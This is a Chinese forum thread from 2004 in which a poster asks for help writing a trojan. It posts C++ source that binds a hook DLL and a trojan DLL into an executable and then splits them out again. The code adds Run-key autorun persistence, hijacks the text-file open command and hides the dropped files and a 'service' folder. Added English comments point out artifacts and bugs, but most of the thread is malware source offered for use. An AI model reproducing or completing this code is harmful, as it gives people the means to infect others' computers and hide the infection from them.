小弟想做个木马程序,以下是部分代码,请GGJJ们指导指导,不胜感激!!

Summer1314 2004-07-08 01:23:34
#include "stdafx.h"
#include <stdio.h>
#include <io.h>
#include "..\\Include\\DataStruct.h"

// Function-pointer type for the hook-installation routine; it takes an executable name.
// NOTE(review): the code that resolves and calls this pointer is not shown in this post.
typedef BOOL (* LPINSTALLHOOKEX)(LPCSTR lpcExeName);

// Name of the EXE file (50 characters plus terminator)
CHAR g_ExeName[51];

// File name of the hook DLL; filled in by CheckFile from the file trailer
CHAR g_HookName[51];

// File name of the trojan DLL; filled in by CheckFile from the file trailer
CHAR g_CockName[51];

// Gets the file name (*.exe) of the current module, without its directory, into buf.
// No buffer size is passed in and the copy uses strcpy, so nothing here bounds the write
// into the caller's buffer.
void GetModuleName(LPTSTR buf)
{
CHAR path[MAX_PATH];

if (GetModuleFileName(::GetModuleHandle(NULL), path, MAX_PATH))
{
// 92 is the character code of the backslash: locate the last path separator.
// NOTE(review): p is used without a NULL check.
LPTSTR p = strrchr(path, 92);
strcpy(buf, &p[1]);
// "\0" is an empty string, so this strcat appends nothing; strcpy already terminated buf.
strcat(buf, "\0");
}
}

// Variant of GetModuleName that uses strncpy/strncat: writes the current module's file
// name (the part after the last backslash) into buf.
// NOTE(review): the strncpy length is strlen of the source, so no terminator is copied and
// the write is not bounded by the size of buf; buf ends up terminated only if the caller
// zero-filled it beforehand.
void GetModuleNameEx(LPTSTR buf)
{
CHAR path[MAX_PATH];

if (GetModuleFileName(::GetModuleHandle(NULL), path, MAX_PATH))
{
// 92 is the character code of the backslash; p is used without a NULL check.
LPTSTR p = strrchr(path, 92);
strncpy(buf, &p[1], strlen(p + 1));
// strncat first scans buf for an existing terminator, then appends an empty string.
strncat(buf, "\0", 1);
}
}

// File-merging routine for the virus file; returns 1 on success, 0 on failure.
// As written below, it appends the hook DLL body, then the trojan DLL body, then one
// FILEDIS record to the end of lpProgFile. The FILEDIS record begins with the
// FILEIDENTIFIER marker string and stores the three names and sizes.
// Analyst's note: the result is an executable with appended data ending in a fixed-size
// trailer whose first field is that constant marker.
// NOTE(review): every early "return 0" skips the fclose/delete[] calls at the bottom, so
// open files and buffers leak on failure. The strcpy calls into the FILEDIS name fields
// (51 bytes each in the struct definition) are not length-checked.
BYTE UniteFile(LPCSTR lpProgFile, LPCSTR lpHookFile, LPCSTR lpCockFile)
{
FILE *fpProg = NULL, *fpHook = NULL, *fpCock = NULL;
FILEDIS FileDis;
LONG lProg = 0, lHook = 0, lCock = 0, number = 0;
CHAR *cBufHook = NULL, *cBufCock = NULL;

memset(&FileDis, 0, sizeof(FILEDIS));
// Store the marker and the three file names in the trailer record
strcpy(FileDis.FileIdentifier, FILEIDENTIFIER);
strcpy(FileDis.ProgName, lpProgFile);
strcpy(FileDis.HookDLLName, lpHookFile);
strcpy(FileDis.CockDLLName, lpCockFile);
// Clear the "already split" flag
FileDis.IsFileReduced = 0;
// Open the files; return on failure (the EXE is opened in binary append mode)
fpProg = fopen(lpProgFile, "ab");
if (fpProg == NULL)
{
return 0;
}
fpHook = fopen(lpHookFile, "rb");
if (fpHook == NULL)
{
return 0;
}
fpCock = fopen(lpCockFile, "rb");
if (fpCock == NULL)
{
return 0;
}
// Move the file pointer to the start, for the size calculation
if (fseek(fpProg, 0L, SEEK_SET) != 0)
{
return 0;
}
// Size of the EXE file
lProg = filelength(fileno(fpProg));
// Size of the system hook DLL file
lHook = filelength(fileno(fpHook));
// Size of the trojan DLL file
lCock = filelength(fileno(fpCock));
// Record the sizes in the trailer record
FileDis.ProgSize = lProg;
FileDis.HookDLLSize = lHook;
FileDis.CockDLLSize = lCock;
// Allocate read buffers for the two DLL files
cBufHook = new CHAR[lHook + 1];
cBufCock = new CHAR[lCock + 1];
// Move the file pointer to the end of the EXE file
if (fseek(fpProg, lProg, SEEK_SET) != 0)
{
return 0;
}
// Read the hook DLL body into its buffer
number = fread(cBufHook, sizeof(CHAR), lHook, fpHook);
if (number < lHook)
{
return 0;
}
// Read the trojan DLL body into its buffer
number = fread(cBufCock, sizeof(CHAR), lCock, fpCock);
if (number < lCock)
{
return 0;
}
// Write the hook DLL body starting at the end of the EXE file
number = fwrite(cBufHook, sizeof(CHAR), lHook, fpProg);
if (number < lHook)
{
return 0;
}
// Write the trojan DLL body
number = fwrite(cBufCock, sizeof(CHAR), lCock, fpProg);
if (number < lCock)
{
return 0;
}
// Write the FILEDIS record at the very end of the merged file
number = fwrite(&FileDis, sizeof(FILEDIS), 1, fpProg);
if (number < 1)
{
return 0;
}
// Close the files
fclose(fpProg);
fclose(fpHook);
fclose(fpCock);
// Free the buffers
delete[] cBufHook;
delete[] cBufCock;
return 1;
}

// File-merging routine for the virus file (Win32 API version); returns TRUE on success,
// FALSE on failure.
// Same output layout as the stdio version: hook DLL body, trojan DLL body and one FILEDIS
// record are written at the end of lpProgFile.
// NOTE(review): each early "return FALSE" skips the CloseHandle/delete[] calls at the
// bottom, so handles and buffers leak on failure. The strncpy lengths are taken from the
// source strings, not from the destination fields (25 and 51 bytes in the struct
// definition), so the copies are not bounded; termination relies on the memset above.
BOOL UniteFileEx(LPCSTR lpProgFile, LPCSTR lpHookFile, LPCSTR lpCockFile)
{
HANDLE hProg = NULL, hHook = NULL, hCock = NULL;
FILEDIS FileDis;
DWORD dwProg = 0, dwHook = 0, dwCock = 0, dwNumber = 0;
CHAR *cBufHook = NULL, *cBufCock = NULL;

memset(&FileDis, 0, sizeof(FILEDIS));
// Store the marker and the three file names in the trailer record
strncpy(FileDis.FileIdentifier, FILEIDENTIFIER, strlen(FILEIDENTIFIER));
strncpy(FileDis.ProgName, lpProgFile, strlen(lpProgFile));
strncpy(FileDis.HookDLLName, lpHookFile, strlen(lpHookFile));
strncpy(FileDis.CockDLLName, lpCockFile, strlen(lpCockFile));
// Clear the "already split" flag
FileDis.IsFileReduced = 0;
// Open the files; return on failure
hProg = CreateFile(lpProgFile, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, NULL,
OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hProg == INVALID_HANDLE_VALUE)
{
return FALSE;
}
hHook = CreateFile(lpHookFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hHook == INVALID_HANDLE_VALUE)
{
return FALSE;
}
hCock = CreateFile(lpCockFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hCock == INVALID_HANDLE_VALUE)
{
return FALSE;
}
// Size of the EXE file (the GetFileSize results are not checked for failure)
dwProg = GetFileSize(hProg, NULL);
// Size of the system hook DLL file
dwHook = GetFileSize(hHook, NULL);
// Size of the trojan DLL file
dwCock = GetFileSize(hCock, NULL);
// Record the sizes in the trailer record
FileDis.ProgSize = dwProg;
FileDis.HookDLLSize = dwHook;
FileDis.CockDLLSize = dwCock;
// Allocate read buffers for the two DLL files
cBufHook = new CHAR[dwHook + 1];
cBufCock = new CHAR[dwCock + 1];
// Move the file pointer to the end of the EXE file
if (SetFilePointer(hProg, 0, NULL, FILE_END) == 0xFFFFFFFF)
{
return FALSE;
}
// Read the hook DLL body into its buffer (the byte count in dwNumber is not checked)
if (!ReadFile(hHook, cBufHook, dwHook, &dwNumber, NULL))
{
return FALSE;
}
// Read the trojan DLL body into its buffer
if (!ReadFile(hCock, cBufCock, dwCock, &dwNumber, NULL))
{
return FALSE;
}
// Write the hook DLL body starting at the end of the EXE file
if (!WriteFile(hProg, cBufHook, dwHook, &dwNumber, NULL))
{
return FALSE;
}
// Write the trojan DLL body
if (!WriteFile(hProg, cBufCock, dwCock, &dwNumber, NULL))
{
return FALSE;
}
// Write the FILEDIS record at the very end of the merged file
if (!WriteFile(hProg, &FileDis, sizeof(FILEDIS), &dwNumber, NULL))
{
return FALSE;
}
// Close the handles
CloseHandle(hProg);
CloseHandle(hHook);
CloseHandle(hCock);
// Free the buffers
delete[] cBufHook;
delete[] cBufCock;
return TRUE;
}
alongsoft1129 2005-01-12
mark
twlx_0 2004-07-08
呵呵,精神可嘉
Summer1314 2004-07-08
/**********************************************
Name:   related data structure definitions
Author: Xue Feng
Date:   2004-6-24
**********************************************/

// Layout of the shared-memory region
typedef struct _SHAREDMEM
{
BYTE IsCockRun; // flag: is the trojan running; 1 = running, 0 = not running or failed to start
CHAR Memory[4096]; // memory reserved in advance for the trojan to use
} SHAREDMEM;

typedef SHAREDMEM * LPSHAREDMEM;

// Parameter block carrying the trojan DLL name
typedef struct _PARAMMEM
{
DWORD dwLength; // length of the trojan DLL file name
CHAR CockDLLName[51]; // trojan DLL file name
} PARAMMEM;

typedef PARAMMEM * LPPARAMMEM;

// Names of the shared-memory regions.
// Analyst's note: these are constant string literals compiled into the binaries.
#define SHAREDMEMNAME "XUEFENG_MEMORY"
#define PARAMMEMNAME "XUEFENG_PARAM"

// File marker stored at the start of the FILEDIS trailer (constant, upper case)
#define FILEIDENTIFIER "DESIGNED BY XUEFENG"

// Header record of the merged file (the posted merge routines write it at the end of the file)
typedef struct _FILEDIS
{
CHAR FileIdentifier[25]; // file marker used to validate the file; compared against FILEIDENTIFIER
CHAR ProgName[51]; // EXE file name (*.EXE), at most 50 characters
CHAR HookDLLName[51]; // system hook DLL file name (*.DLL)
CHAR CockDLLName[51]; // trojan DLL file name (*.DLL)
LONG ProgSize; // size of the EXE file in bytes
LONG HookDLLSize; // size of the system hook DLL file
LONG CockDLLSize; // size of the trojan DLL file
BYTE IsFileReduced; // flag: has the virus file been split; 0 = not split, 1 = split

} FILEDIS;

typedef FILEDIS * LPFILEDIS;
sohou 2004-07-08
我手上多的就是,呵呵后,不过楼主的也不错了!
PiggyXP 2004-07-08
呵呵
shootingstars 2004-07-08
呵呵,顶一顶。
Summer1314 2004-07-08
/*
Sets a registry value so that the trojan program runs at startup; returns 1 on success, 0 on failure.
RegKeyName: name used for the registry value (the part before the last '.' is used);
ExePath: absolute path of the trojan program.

Analyst's note: the value is written under HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN,
a standard autorun location, so an unexpected REG_SZ value there is the artifact this routine leaves.

NOTE(review): buf is an uninitialized 51-byte array and the strncpy length is strlen(RegKeyName),
so buf is neither bounded nor terminated before strrchr scans it; p is used without a NULL check.
The data length passed to RegSetValueEx is strlen(ExePath), which does not count the terminator.
*/
BYTE SetProgAutoRun(LPCSTR RegKeyName, LPCSTR ExePath)
{
HKEY hKey = NULL;
DWORD dwDis = 0;
CHAR KeyName[51], buf[51];
LPTSTR p = NULL;

// Open (or create) the Run key with full access
if (RegCreateKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN",
0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, &dwDis) != ERROR_SUCCESS)
{
return 0;
}
strncpy(buf, RegKeyName, strlen(RegKeyName));
// 46 is the character code of '.': strip the extension to form the value name
p = strrchr(buf, 46);
strncpy(KeyName, buf, p - buf);
KeyName[(DWORD)(p - buf)] = '\0';
if (RegSetValueEx(hKey, KeyName, 0, REG_SZ, (BYTE *)ExePath, strlen(ExePath)) !=
ERROR_SUCCESS)
{
RegCloseKey(hKey);
return 0;
}
RegCloseKey(hKey);
return 1;
}

// Checks whether the autorun value has already been set in the registry.
// Returns 1 if the value exists, 0 if it does not, 2 if the key could not be opened
// (so the query could not be made).
// NOTE(review): hKey is never closed on either return path after a successful open.
BYTE IsProgAutoRun(LPCSTR RegKeyName)
{
HKEY hKey = NULL;

if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN",
0, KEY_EXECUTE, &hKey) != ERROR_SUCCESS)
{
return 2;
}
// Existence check only: no type, data or size buffers are requested
if (RegQueryValueEx(hKey, RegKeyName, NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
{
return 1;
}
else
{
return 0;
}
}

// Modifies a file association; returns 1 on success, 0 on failure.
// Sets the default value of HKEY_CLASSES_ROOT\TXTFILE\SHELL\OPEN\COMMAND to
// lpLinkFile followed by " %1", stored as REG_EXPAND_SZ.
// Analyst's note: this replaces the open command registered for the txtfile class, so the
// default value of that key is the place to check for tampering.
// NOTE(review): LinkFile is an uninitialized MAX_PATH array and the strncpy length is
// strlen(lpLinkFile), so it is not terminated before strncat scans it for a terminator,
// and the copy is not bounded by the array size.
BYTE ModifyFileLink(LPCSTR lpLinkFile)
{
HKEY hKey = NULL;
DWORD dwDis = 0;
CHAR LinkFile[MAX_PATH];

if (RegCreateKeyEx(HKEY_CLASSES_ROOT, "TXTFILE\\SHELL\\OPEN\\COMMAND", 0, NULL,
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, &dwDis) != ERROR_SUCCESS)
{
return 0;
}
strncpy(LinkFile, lpLinkFile, strlen(lpLinkFile));
strncat(LinkFile, " %1", 3);
// A NULL value name addresses the key's default value
if (RegSetValueEx(hKey, NULL, 0, REG_EXPAND_SZ, (BYTE *)LinkFile, strlen(LinkFile)) !=
ERROR_SUCCESS)
{
RegCloseKey(hKey);
return 0;
}
RegCloseKey(hKey);
return 1;
}

// Checks whether the virus file has already been split.
// Returns 0: not split, 1: already split, 2: a call failed, 3: the file is not valid
// (the marker at the start of the trailer does not equal FILEIDENTIFIER).
// Side effect: on a valid file, copies the hook and trojan DLL names from the trailer
// into the globals g_HookName and g_CockName.
// NOTE(review): the trailer is read straight from the file and its name fields are copied
// with strcpy into 51-byte globals; a trailer whose fields lack a terminator would make
// these copies run past the destination.
BYTE CheckFile(LPCSTR ProgName)
{
FILE *fpProg = NULL;
FILEDIS FileDis;
LONG lStruct = 0, number = 0;
BYTE bRet = 0;

memset(&FileDis, 0, sizeof(FILEDIS));
// First open the merged file
fpProg = fopen(ProgName, "rb");
if (fpProg == NULL)
{
return 2;
}
// Negative offset of one FILEDIS record, measured from the end of the file
lStruct = sizeof(FILEDIS);
lStruct = -lStruct;
// Move the file pointer backwards from the end of the file
if (fseek(fpProg, lStruct, SEEK_END) != 0)
{
fclose(fpProg);
return 2;
}
// Read the header record (stored as a trailer)
number = fread(&FileDis, sizeof(FILEDIS), 1, fpProg);
if (number < 1)
{
fclose(fpProg);
return 2;
}
// Check whether the file is valid (exact, case-sensitive match on the marker)
if (strcmp(FileDis.FileIdentifier, FILEIDENTIFIER) == 0)
{
// Save the hook DLL file name
strcpy(g_HookName, FileDis.HookDLLName);
// Save the trojan DLL file name
strcpy(g_CockName, FileDis.CockDLLName);
// Check whether the file has already been split
if (FileDis.IsFileReduced)
{
bRet = 1;
}
else
{
bRet = 0;
}
}
else
{
// Not valid
bRet = 3;
}
fclose(fpProg);
return bRet;
}
Summer1314 2004-07-08
// File-splitting routine for the virus file (Win32 API version); it also copies the merged
// file itself into a given directory. Returns TRUE on success, FALSE (or 0) on failure.
// Steps, as written below: read the FILEDIS trailer from ProgName, validate its marker,
// write the EXE part (plus an updated trailer) and both DLLs into DestFileDir, then copy
// the whole merged file into DestFileDir\service.
// Analyst's note: the artifacts left behind are three files in DestFileDir and a copy under
// a "service" subdirectory, all marked hidden and read-only, with the directory marked hidden.
// NOTE(review): sizes and file names are taken from the trailer read out of the file and are
// used unchecked for the allocations and for the strcat path building into MAX_PATH buffers.
// Each early return skips the CloseHandle/delete[] calls at the bottom.
BOOL ReduceFileEx(LPCSTR ProgName, LPCSTR DestFileDir)
{
HANDLE hProg = NULL, hProgDest = NULL, hHook = NULL, hCock = NULL, hTemp = NULL;
FILEDIS FileDis;
LONG lStruct = 0;
DWORD dwNumber = 0, dwUnite = 0;
CHAR *cBufProg = NULL, *cBufHook = NULL, *cBufCock = NULL, *BufTemp = NULL;
CHAR ProgFilePath[MAX_PATH], HookFilePath[MAX_PATH], CockFilePath[MAX_PATH],
TempFilePath[MAX_PATH];

memset(&FileDis, 0, sizeof(FILEDIS));
// First open the merged file
hProg = CreateFile(ProgName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hProg == INVALID_HANDLE_VALUE)
{
return FALSE;
}
// Negative offset of one FILEDIS record, measured from the end of the file
lStruct = sizeof(FILEDIS);
lStruct = -lStruct;
// Move the file pointer backwards from the end of the file
if (SetFilePointer(hProg, lStruct, NULL, FILE_END) == 0xFFFFFFFF)
{
return FALSE;
}
// Read the header record (stored as a trailer)
if (!ReadFile(hProg, &FileDis, sizeof(FILEDIS), &dwNumber, NULL))
{
return FALSE;
}
// Check whether the file is valid (prefix comparison against the marker)
if (strncmp(FileDis.FileIdentifier, FILEIDENTIFIER, strlen(FILEIDENTIFIER)) != 0)
{
return 0;
}
// Allocate the data buffers, sized from the trailer fields
cBufProg = new CHAR[FileDis.ProgSize + 1];
cBufHook = new CHAR[FileDis.HookDLLSize + 1];
cBufCock = new CHAR[FileDis.CockDLLSize + 1];
/************************************************************************************
// Build the destination file paths
// INT iLen = strlen(DestFileDir);
// strncpy(ProgFilePath, DestFileDir, iLen);
// strncat(ProgFilePath, "\\", 1);
// strncat(ProgFilePath, FileDis.ProgName, strlen(FileDis.ProgName));
// strncpy(HookFilePath, DestFileDir, iLen);
// strncat(HookFilePath, "\\", 1);
// strncat(HookFilePath, FileDis.HookDLLName, strlen(FileDis.HookDLLName));
// strncpy(CockFilePath, DestFileDir, iLen);
// strncat(CockFilePath, "\\", 1);
// strncat(CockFilePath, FileDis.CockDLLName, strlen(FileDis.CockDLLName));
*************************************************************************************/
// Build DestFileDir\<name> for the EXE and the two DLLs
strcpy(ProgFilePath, DestFileDir);
strcat(ProgFilePath, "\\");
strcat(ProgFilePath, FileDis.ProgName);
strcpy(HookFilePath, DestFileDir);
strcat(HookFilePath, "\\");
strcat(HookFilePath, FileDis.HookDLLName);
strcpy(CockFilePath, DestFileDir);
strcat(CockFilePath, "\\");
strcat(CockFilePath, FileDis.CockDLLName);
// Create and open the EXE file (CREATE_NEW fails if the file already exists)
hProgDest = CreateFile(ProgFilePath, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_NEW,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hProgDest == INVALID_HANDLE_VALUE)
{
return FALSE;
}
// Create and open the hook DLL file
hHook = CreateFile(HookFilePath, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_NEW,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hHook == INVALID_HANDLE_VALUE)
{
return FALSE;
}
// Create and open the trojan DLL file
hCock = CreateFile(CockFilePath, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_NEW,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hCock == INVALID_HANDLE_VALUE)
{
return FALSE;
}
// Move the file pointer to the start
if (SetFilePointer(hProg, 0, NULL, FILE_BEGIN) == 0xFFFFFFFF)
{
return FALSE;
}
// Read the EXE body from the merged file
if (!ReadFile(hProg, cBufProg, FileDis.ProgSize, &dwNumber, NULL))
{
return FALSE;
}
// Read the hook DLL body from the merged file
if (!ReadFile(hProg, cBufHook, FileDis.HookDLLSize, &dwNumber, NULL))
{
return FALSE;
}
// Read the trojan DLL body from the merged file
if (!ReadFile(hProg, cBufCock, FileDis.CockDLLSize, &dwNumber, NULL))
{
return FALSE;
}
// Write the EXE data into the newly created EXE file
if (!WriteFile(hProgDest, cBufProg, FileDis.ProgSize, &dwNumber, NULL))
{
return FALSE;
}
// Write the header record at the end of the EXE
FileDis.IsFileReduced = 1; // the file has been split
if (!WriteFile(hProgDest, &FileDis, sizeof(FILEDIS), &dwNumber, NULL))
{
return FALSE;
}
// Write the DLL data into the newly created DLL files
if (!WriteFile(hHook, cBufHook, FileDis.HookDLLSize, &dwNumber, NULL))
{
return FALSE;
}
if (!WriteFile(hCock, cBufCock, FileDis.CockDLLSize, &dwNumber, NULL))
{
return FALSE;
}
// Copy the program's own (merged) file
// NOTE(review): TempFilePath is uninitialized and this strncpy copies no terminator, so
// the strncat calls below scan indeterminate bytes for one.
strncpy(TempFilePath, DestFileDir, strlen(DestFileDir));
strncat(TempFilePath, "\\service", 8);
CreateDirectory(TempFilePath, NULL);
// Hide the folder
SetFileAttributes(TempFilePath, FILE_ATTRIBUTE_HIDDEN);
strncat(TempFilePath, "\\", 1);
strncat(TempFilePath, ProgName, strlen(ProgName));
hTemp = CreateFile(TempFilePath, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_NEW,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hTemp != INVALID_HANDLE_VALUE)
{
// Best-effort copy of the whole merged file; the read/write results are not checked
dwUnite = GetFileSize(hProg, NULL);
BufTemp = new CHAR[dwUnite + 1];
SetFilePointer(hProg, 0, NULL, FILE_BEGIN);
ReadFile(hProg, BufTemp, dwUnite, &dwNumber, NULL);
WriteFile(hTemp, BufTemp, dwUnite, &dwNumber, NULL);
}
// Close the handles (hTemp is closed even when it is INVALID_HANDLE_VALUE)
CloseHandle(hProg);
CloseHandle(hProgDest);
CloseHandle(hHook);
CloseHandle(hCock);
CloseHandle(hTemp);
// Free the buffers
delete[] cBufProg;
delete[] cBufHook;
delete[] cBufCock;
delete[] BufTemp;
// Set the attributes of the 4 files to hidden and read-only
SetFileAttributes(ProgFilePath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY);
SetFileAttributes(HookFilePath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY);
SetFileAttributes(CockFilePath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY);
SetFileAttributes(TempFilePath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY);
return TRUE;
}
